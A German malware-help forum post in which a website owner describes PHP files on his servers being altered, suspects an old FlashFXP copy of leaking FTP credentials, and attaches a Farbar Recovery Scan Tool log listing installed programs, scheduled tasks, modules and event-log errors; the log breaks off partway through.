FTPs Flash FXP Dateien Manipuliert

stefan87 · 26.03.2015, 14:38

Hallo Leute,

ich habe 3 verschiedene Webseiten, gestern ist mir aufgefallen das ca. 1 Stunde zuvor sehr viele Dateien hauptsächlich die im Hauptverzeichnis des Servers geändert wurden.
Es wurde die Datei um den Inhalt der Datei "welcher virus löst diese zeile aus.txt" erweitert.
Befallen wurden nur .php Dateien. Es sieht nach einem Skript aus der das vorgenommen hat auf 3 Servern alles innerhalb von 2 Sekunden.

Die Server hatten sichere Kennwörter, verwendet wurde eine Flash FXP Variante von 2003 (ja ich weiß alt). Ich kann nicht 100% sicherstellen wo ich mir die Software damals geladen habe es wäre also denkbar das die Software befallen ist.

Ich habe mir Wireshark geladen und versucht den Netzwerk Transfer zu analysieren weil ich den Verdacht hatte das das Programm die Daten weiterleitet

Zunächst wurde mein Verdacht bestätigt.
Zeile 17 sowie 18 in Datei "logfile wireshark" dort taucht eine Ip die nach Ortung in Russland liegt auf, das kam nachdem ich Flash FXP gestartet habe.

Jetzt habe ich Flash FXP allerdings deinstalliert + gelöscht + die aktuellste Version von Chip geladen und in einen anderen Ordner installiert.

Leider taucht in den IPs selbst kurz nach dem Neustart wieder auf.

Gemacht habe ich auserdem folgendes, komplett Scann mit Avira sowie Trend Micro pc cillin.
Beide male Ergebnislos.

Dann hab ich noch das Malewarebytes runter geladen, abgesehen davon das er die ICQ Toolbar als unnötig empfahl auch hier nichts.

> dann habe ich mit euren Tools losgelegt < alles verlief nach Plan bis zum letzten TOOL.
Nachdem es *durch* war kam das der Rechner mit einem Rootkit infiziert sein könnte.

Anbei alle Logfiles, Danke schon mal für die Hilfe !

Gruß
Stefan

Code:

ATTFilter

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 11-03-2015
Ran by k at 2015-03-26 13:51:33
Running from C:\Users\k\Downloads\trojaner anleitung
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avira Desktop (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Trend Micro Internet Security (Enabled - Up to date) {F2F88E6A-3C7A-545F-268A-5D0BDD38EE06}
AS: Avira Desktop (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Trend Micro Internet Security (Enabled - Up to date) {49996F8E-1A40-5BD1-1C3A-6679A6BFA4BB}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

ACDSee 4.0.1 Std Trial Version (HKLM\...\{5F7C2680-9431-48AD-8598-5B86B904EA61}) (Version: 4.00.0001 - ACD Systems Ltd)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 17.0.0.124 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Flash Player 17 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 17.0.0.134 - Adobe Systems Incorporated)
Adobe Photoshop CS2 (HKLM\...\Adobe Photoshop CS2 - {236BB7C4-4419-42FD-0407-1E257A25E34D}) (Version: 9.0 - Adobe Systems, Inc.)
Adobe Reader XI (11.0.10) - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Anti-Twin (Installation 14.03.2015) (HKLM\...\Anti-Twin 2015-03-14 16.21.58) (Version:  - Joerg Rosenthal, Germany)
Apple Application Support (32-Bit) (HKLM\...\{2FE00055-C4F3-4F7A-AEDD-E198D54CF12F}) (Version: 3.1.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{28ED482A-56DB-47D9-8D9E-990FA8CD7D3D}) (Version: 8.1.0.18 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Communications Inc.(R) AR8121/AR8113/AR8114 Gigabit/Fast Ethernet Driver (HKLM\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.18 - Atheros Communications Inc.)
Avira (HKLM\...\{bd538030-07d4-4999-a525-7fafa2483f56}) (Version: 1.1.30.21727 - Avira Operations & Co. KG)
Avira (Version: 1.1.30.21727 - Avira Operations & Co. KG) Hidden
Avira Free Antivirus (HKLM\...\Avira AntiVir Desktop) (Version: 15.0.8.656 - Avira)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
Brother P-touch Address Book 1.0 (HKLM\...\InstallShield_{98E9B724-0E62-4812-B6CC-C6A228BBC562}) (Version: 1.0 - Brother Industries, Ltd.)
Brother P-touch Address Book 1.0 (Version: 1.0 - Brother Industries, Ltd.) Hidden
Brother P-touch Editor 4.2 (Version: 4.2 - Brother Industries, Ltd.) Hidden
Brother P-touch Editor 5.1 (HKLM\...\{39270390-A851-4E4B-94A9-D5C468216ED3}) (Version: 5.1.0200 - Brother Industries, Ltd.)
Brother P-touch Software (Version: 1.0.006 - Brother Industries, Ltd. ) Hidden
Brother QL-Series User's Guide (HKLM\...\InstallShield_{7CCC6E23-0E35-480B-8F0C-8D06F882D5D3}) (Version: 1.0.001 - Brother Industries, Ltd.)
Brother QL-Series User's Guide (Version: 1.0.001 - Brother Industries, Ltd.) Hidden
Canon IJ Network Scan Utility (HKLM\...\Canon_IJ_Network_Scan_UTILITY) (Version:  - )
Canon IJ Network Tool (HKLM\...\Canon_IJ_Network_UTILITY) (Version:  - )
Canon MP Navigator EX 1.1 (HKLM\...\MP Navigator EX 1.1) (Version:  - )
Canon MX7600 series (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX7600_series) (Version:  - )
Canon My Printer (HKLM\...\CanonMyPrinter) (Version:  - )
Canon Utilities Easy-PhotoPrint EX (HKLM\...\Easy-PhotoPrint EX) (Version:  - )
CCleaner (HKLM\...\CCleaner) (Version: 5.00 - Piriform)
DivX-Setup (HKLM\...\DivX Setup) (Version: 2.7.0.31 - DivX, LLC)
DJI driver version 1.0 (HKLM\...\{9A2C30EE-6E35-4479-B0E6-B1B47A54E8CD}_is1) (Version: 1.0 - DJI)
DJI Phantom 2 Assistant version 2.00 (HKLM\...\{8E43DA79-9B6D-446F-86BD-E7D5A567319B}_is1) (Version: 2.00 - DJI)
FlashFXP 5 (HKLM\...\FlashFXP 5) (Version: 5.1.0.3820 - OpenSight Software LLC)
Google Chrome (HKLM\...\Google Chrome) (Version: 41.0.2272.101 - Google Inc.)
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden
Hauppauge WinTV 7 (HKLM\...\Hauppauge WinTV 7) (Version: v7.0.29209 (CD 2.4) - Hauppauge Computer Works)
ICQ7.5 (HKLM\...\{7578ADEA-D65F-4C89-A249-B1C88B6FFC20}) (Version: 7.5 - ICQ)
iExplorer 2.2.1.3 (HKLM\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version:  - Macroplant, LLC)
iFunbox (v2.7.2386.747), iFunbox DevTeam (HKLM\...\iFunbox_is1) (Version: v2.7.2386.747 - )
IncrediMail (HKLM\...\IncrediMail) (Version:  5.8.6.4332 - IncrediMail Ltd.)
iTunes (HKLM\...\{B8032A6B-C4D0-4744-B75F-9DDCB56B5C6F}) (Version: 12.1.0.71 - Apple Inc.)
Malwarebytes Anti-Malware Version 2.1.4.1018 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.4.1018 - Malwarebytes Corporation)
MaxTalk  (HKLM\...\1133-9239-8439-9600-user) (Version: 2.4.5 - Sputnik Engineering AG)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Access database engine 2010 (German) (HKLM\...\{90140000-00D1-0407-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office 2000 SR-1 Disc 2 (HKLM\...\{00040407-78E1-11D2-B60F-006097C998E7}) (Version: 9.00.3821 - Microsoft Corporation)
Microsoft Office 2000 SR-1 Professional (HKLM\...\{00010407-78E1-11D2-B60F-006097C998E7}) (Version: 9.00.3821 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Mozilla Firefox 36.0.4 (x86 de) (HKLM\...\Mozilla Firefox 36.0.4 (x86 de)) (Version: 36.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 34.0.5 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NVIDIA 3D Vision Treiber 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 340.52 - NVIDIA Corporation)
NVIDIA Grafiktreiber 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation)
NVIDIA Update 10.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 10.4.0 - NVIDIA Corporation)
OpenOffice 4.1.1 (HKLM\...\{ACD0FFF9-6B35-43C1-82DB-9FF6990E8602}) (Version: 4.11.9775 - Apache Software Foundation)
PDF Architect 2 Create Module (Version: 2.1.6.19758 - pdfforge GmbH) Hidden
PDF Architect 2 Edit Module (Version: 2.1.6.19758 - pdfforge GmbH) Hidden
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.0.0 - pdfforge)
Personal Backup 4.1.0 (HKLM\...\Personal Backup_is1) (Version:  - J. Rathlev)
PGP Desktop (HKLM\...\{04A8595A-4B2F-4A20-BA5D-E6B371657FF8}) (Version: 10.0.2.13 - PGP Corporation)
PowerCinema (HKLM\...\{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version: 5.1.4410j - CyberLink Corp.)
ProSafe Plus Utility (HKLM\...\InstallShield_{B98C06F7-F167-45AF-B612-F89DA39BB22F}) (Version: 2.2.37 - Ihr Firmenname)
ProSafe Plus Utility (Version: 2.2.37 - Ihr Firmenname) Hidden
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5859 - Realtek Semiconductor Corp.)
TeamViewer 10 (HKLM\...\TeamViewer) (Version: 10.0.36244 - TeamViewer)
Trend Micro Internet Security (HKLM\...\{ABBD4BA8-6703-40D2-AB1E-5BB1F7DB49A4}) (Version: 8.0 - Trend Micro Inc.)
Trend Micro Titanium (Version: 8.0 - Trend Micro Inc.) Hidden
TrueCrypt (HKLM\...\TrueCrypt) (Version: 7.0a - TrueCrypt Foundation)
tsWebEditor 1.8.5.2 (HKLM\...\tsWebEditor) (Version:  - )
VC80CRTRedist - 8.0.50727.6195 (Version: 1.2.0 - DivX, Inc) Hidden
WinPcap 4.1.3 (HKLM\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.20 (32-Bit) (HKLM\...\WinRAR archiver) (Version: 5.20.0 - win.rar GmbH)
Wireshark 1.12.4 (32-bit) (HKLM\...\Wireshark) (Version: 1.12.4 - The Wireshark developer community, hxxp://www.wireshark.org)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0000002F-0000-0000-C000-000000000046}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0002E005-0000-0000-C000-000000000046}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0BE35200-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0BE35201-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0BE35202-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0BE35203-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{28286AE2-3628-11D4-8168-0050DACFAE5F}\InprocServer32 ->  No File
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{28286AE3-3628-11D4-8168-0050DACFAE5F}\InprocServer32 ->  No File
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{46763EE0-CAB2-11CE-8C20-00AA0051E5D4}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{4969CDC0-6307-11D4-8194-0050DACFAE5F}\InprocServer32 ->  No File
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{4EDE09DD-0761-4ABF-8DAD-1444A02C54A1}\localserver32 -> C:\Program Files\Brother\Ptedit51\Ptedit51.exe (Brother Industries, Ltd.)
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{65105120-AB6A-11D4-81E0-0050DACFAE5F}\InprocServer32 ->  No File
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{88053C33-35CC-11D1-91D6-0060081E8747}\InprocServer32 ->  No File
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{88053C34-35CC-11D1-91D6-0060081E8747}\InprocServer32 -> C:\Windows\system32\DC265Ifr.ocx (FlashPoint Technology, Inc.)
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{8F7B7699-FEA0-11D0-B136-0060976B8BBB}\InprocServer32 ->  No File
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{8F7B769A-FEA0-11D0-B136-0060976B8BBB}\InprocServer32 -> C:\Windows\system32\DC265Ser.ocx (FlashPoint Technology, Inc.)
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 -> No File Path
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{F68B9274-2DF3-11D1-91D6-0060081E8747}\InprocServer32 ->  No File
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{F68B9275-2DF3-11D1-91D6-0060081E8747}\InprocServer32 -> C:\Windows\system32\DC265USB.ocx (FlashPoint Technology, Inc.)
CustomCLSID: HKU\S-1-5-21-2895699136-3436441363-2783724240-1001_Classes\CLSID\{FC17C3E0-A694-11D4-81DB-0050DACFAE5F}\InprocServer32 ->  No File

==================== Restore Points  =========================

20-03-2015 14:57:07 Windows Update
22-03-2015 19:00:06 Windows-Sicherung
24-03-2015 21:17:55 Windows Update
25-03-2015 03:00:11 Windows Update
25-03-2015 19:04:15 Installiert ProSafe Plus Utility

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 03:04 - 2009-06-10 22:39 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {11E70B01-712E-4996-A5C7-3AA00682B89D} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {1CA58498-0CF6-42ED-863B-3E08C85D6265} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-12-12] (Google Inc.)
Task: {7D3C7871-A917-4EF0-82E8-5F0A96423051} - System32\Tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask => BthUdTask.exe
Task: {BD717BC1-E200-41E5-A9DF-6F855CD32EAA} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-11-21] (Piriform Ltd)
Task: {C5ED9FEB-3BC1-4270-ADD6-B1176EA5C4E0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-03-21] (Adobe Systems Incorporated)
Task: {CDFEB96C-5BB8-44EB-A3DB-865E78AB49DD} - System32\Tasks\{9B52E0BA-337F-45FF-8109-F8F7612BC79C} => pcalua.exe -a D:\SInstall\SInstall.exe -d D:\
Task: {D21F6024-191F-4454-BBBC-09A650DA2549} - System32\Tasks\Microsoft\Windows\Application Experience\AitAgent => aitagent.exe
Task: {D68D5789-81AB-4250-951E-93D7E0594AF4} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-12-12] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) ==============

2014-12-12 17:26 - 2014-07-02 20:42 - 00107992 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax.dll
2014-12-15 09:20 - 2013-01-16 02:50 - 00039424 _____ () C:\Program Files\Trend Micro\AMSP\boost_date_time-vc110-mt-1_49.dll
2014-12-15 09:20 - 2014-07-01 11:19 - 00542720 _____ () C:\Program Files\Trend Micro\AMSP\sqlite3.dll
2014-12-15 09:20 - 2013-01-16 02:55 - 00049152 _____ () C:\Program Files\Trend Micro\AMSP\boost_thread-vc110-mt-1_49.dll
2014-12-15 09:20 - 2012-12-18 21:04 - 01098240 _____ () C:\Program Files\Trend Micro\AMSP\libprotobuf.dll
2014-12-15 09:20 - 2013-01-16 02:50 - 00016896 _____ () C:\Program Files\Trend Micro\AMSP\boost_system-vc110-mt-1_49.dll
2014-12-15 09:14 - 2014-07-20 20:04 - 00181432 _____ () C:\Program Files\Trend Micro\UniClient\plugins\LUADLL.dll
2015-01-20 22:35 - 2015-01-20 22:35 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-01-20 22:35 - 2015-01-20 22:35 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2014-12-12 14:50 - 2007-08-10 23:05 - 00290913 _____ () C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLCapSvc.exe
2014-12-12 14:50 - 2007-08-10 23:05 - 00249959 _____ () C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLCapEngine.dll
2014-12-12 14:50 - 2007-08-10 23:05 - 00032768 _____ () C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLCapSvcps.dll
2014-12-12 18:43 - 2011-07-11 19:02 - 00018944 _____ () C:\Program Files\WinTV\TVServer\HauppaugeTVServerps.dll
2014-12-15 09:21 - 2014-07-20 20:04 - 00072192 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_thread-vc110-mt-1_52.dll
2014-12-15 09:21 - 2014-07-20 20:04 - 00016896 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_system-vc110-mt-1_52.dll
2014-12-15 09:21 - 2014-07-20 20:04 - 00040960 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_date_time-vc110-mt-1_52.dll
2014-12-15 09:21 - 2014-07-20 20:04 - 00631808 _____ () C:\Program Files\Trend Micro\Titanium\plugin\Pt\boost_regex-vc110-mt-1_52.dll
2014-12-12 14:49 - 2007-08-10 23:07 - 00262247 ____N () C:\Program Files\Cyberlink\Shared files\RichVideo.exe
2014-12-12 14:50 - 2007-08-10 23:05 - 00118879 _____ () C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLSched.exe
2014-12-12 14:50 - 2007-08-10 23:05 - 00114785 _____ () C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLSchMgr.dll
2014-12-12 14:50 - 2007-08-10 23:05 - 00339968 _____ () C:\Program Files\CyberLink\PowerCinema\Kernel\TV\CLTinyDB.dll
2009-09-07 17:33 - 2009-09-07 17:33 - 00073728 _____ () C:\Program Files\IncrediMail\bin\ImAppRU.dll
2009-09-07 17:27 - 2009-09-07 17:27 - 00110592 _____ () C:\Program Files\IncrediMail\bin\ImComUtlU.dll
2014-09-06 11:42 - 2014-09-06 11:42 - 00095790 _____ () C:\Program Files\Wireshark\libgcc_s_sjlj-1.dll
2014-09-30 22:39 - 2014-09-30 22:39 - 00574464 _____ () C:\Program Files\Wireshark\libgcrypt-20.dll
2014-09-30 22:39 - 2014-09-30 22:39 - 00084480 _____ () C:\Program Files\Wireshark\libgpg-error-0.dll
2015-03-04 18:10 - 2015-03-04 18:10 - 00066560 _____ () C:\Program Files\Wireshark\zlib1.dll
2013-03-07 17:34 - 2013-03-07 17:34 - 00155450 _____ () C:\Program Files\Wireshark\libcares-2.dll
2014-09-06 21:56 - 2014-09-06 21:56 - 00999399 _____ () C:\Program Files\Wireshark\libgnutls-28.dll
2014-09-06 10:21 - 2014-09-06 10:21 - 00392622 _____ () C:\Program Files\Wireshark\libgmp-10.dll
2014-09-06 20:29 - 2014-09-06 20:29 - 00171776 _____ () C:\Program Files\Wireshark\libhogweed-2-4.dll
2014-09-06 20:29 - 2014-09-06 20:29 - 00185527 _____ () C:\Program Files\Wireshark\libnettle-4-6.dll
2014-09-06 20:42 - 2014-09-06 20:42 - 00221512 _____ () C:\Program Files\Wireshark\libp11-kit-0.dll
2014-09-05 16:37 - 2014-09-05 16:37 - 00030540 _____ () C:\Program Files\Wireshark\libffi-6.dll
2014-09-06 13:50 - 2014-09-06 13:50 - 00074988 _____ () C:\Program Files\Wireshark\libtasn1-6.dll
2011-06-27 20:49 - 2011-06-27 20:49 - 00708300 _____ () C:\Program Files\Wireshark\libsmi-2.dll
2013-07-19 18:35 - 2013-07-19 18:35 - 00331952 _____ () C:\Program Files\Wireshark\libGeoIP-1.dll
2014-03-31 21:55 - 2014-03-31 21:55 - 00198656 _____ () C:\Program Files\Wireshark\lua52.dll
2014-04-09 03:07 - 2014-04-09 03:07 - 00626410 _____ () C:\Program Files\Wireshark\libcairo-2.dll
2014-04-08 19:35 - 2014-04-08 19:35 - 00222985 _____ () C:\Program Files\Wireshark\libfontconfig-1.dll
2014-04-08 19:32 - 2014-04-08 19:32 - 00479222 _____ () C:\Program Files\Wireshark\libfreetype-6.dll
2014-04-08 19:11 - 2014-04-08 19:11 - 01150462 _____ () C:\Program Files\Wireshark\libxml2-2.dll
2014-04-08 20:00 - 2014-04-08 20:00 - 00607850 _____ () C:\Program Files\Wireshark\libpixman-1-0.dll
2014-04-08 19:01 - 2014-04-08 19:01 - 00174209 _____ () C:\Program Files\Wireshark\libpng15-15.dll
2014-04-09 01:31 - 2014-04-09 01:31 - 00256785 _____ () C:\Program Files\Wireshark\libjasper-1.dll
2014-04-08 20:16 - 2014-04-08 20:16 - 00196540 _____ () C:\Program Files\Wireshark\libjpeg-8.dll
2014-04-09 01:51 - 2014-04-09 01:51 - 00420397 _____ () C:\Program Files\Wireshark\libtiff-5.dll
2014-04-09 08:59 - 2014-04-09 08:59 - 00280211 _____ () C:\Program Files\Wireshark\libharfbuzz-0.dll
2014-05-12 06:45 - 2014-05-12 06:45 - 00065946 _____ () C:\Program Files\Wireshark\lib\gtk-2.0\2.10.0\engines\libwimp.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (whitelisted) ===============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2895699136-3436441363-2783724240-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\k\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.178.1

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^AutoStart IR.lnk => C:\Windows\pss\AutoStart IR.lnk.CommonStartup
MSCONFIG\startupreg: DivXMediaServer => C:\Program Files\DivX\DivX Media Server\DivXMediaServer.exe
MSCONFIG\startupreg: DivXUpdate => "C:\Program Files\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW

==================== Accounts: =============================

Administrator (S-1-5-21-2895699136-3436441363-2783724240-500 - Administrator - Disabled)
Gast (S-1-5-21-2895699136-3436441363-2783724240-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2895699136-3436441363-2783724240-1002 - Limited - Enabled)
k (S-1-5-21-2895699136-3436441363-2783724240-1001 - Administrator - Enabled) => C:\Users\k

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/26/2015 01:38:05 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/26/2015 01:38:04 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/26/2015 01:35:50 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1".
Die abhängige Assemblierung "Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (03/26/2015 01:35:45 PM) (Source: SideBySide) (EventID: 33) (User: )
